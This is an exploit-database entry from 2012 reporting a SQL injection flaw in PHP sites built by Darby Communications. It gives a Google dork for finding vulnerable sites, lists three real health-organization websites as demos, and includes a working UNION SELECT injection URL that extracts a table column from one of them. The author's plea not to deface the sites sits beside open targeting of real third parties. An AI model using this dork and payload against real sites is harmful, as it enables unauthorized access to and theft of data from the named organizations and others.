Darby Communications - SQL Injection Vulnerability

2012-05-29T00:00:00
ID 1337DAY-ID-18383
Type zdt
Reporter D0m12
Modified 2012-05-29T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ==========================================================================
<<<:>>>    Darby Communications - SQL Injection Vulnerability       <<:>>>
==========================================================================
Title:  Darby Communications - SQL Injection Vulnerability
Author : D0m12
Date: 29/05/2012
Google Dork--> intext:"site by darby communications" inurl:.php?id=
Vendor Link: http://darbyfilms.com
Tested On: Win 7
Contact : [email protected]
[+]Demos
http://www.cervicalcanceraction.org/news/news-detail.php?id=30'
http://www.newtbdrugs.org/project.php?id=135'
http://preventb.org/portfolio/news.php?id=17'
[+]Info
Part of Page don't load up properly after adding ' demostrating and sql injection vulnerablity
[+]PoC
Here i extracted details in the title column
http://www.cervicalcanceraction.org/news/news-detail.php?id=-30+UnIoN+select+1,2,GrOUp_COnCaT(title),4,5,6+from+ccatest.events--
SpeCial Appeal to REaders:
Please don't not deface or hack these site.I just posted so that they can fixed asap.
M0rE @ Google
Hope they fix their shit sOOn
Njoy!!!!!!

 #########################################################################
 Greetz To :
 All My Friends From ABH & to All those who know me:)
 #########################################################################



#  0day.today [2018-03-13]  #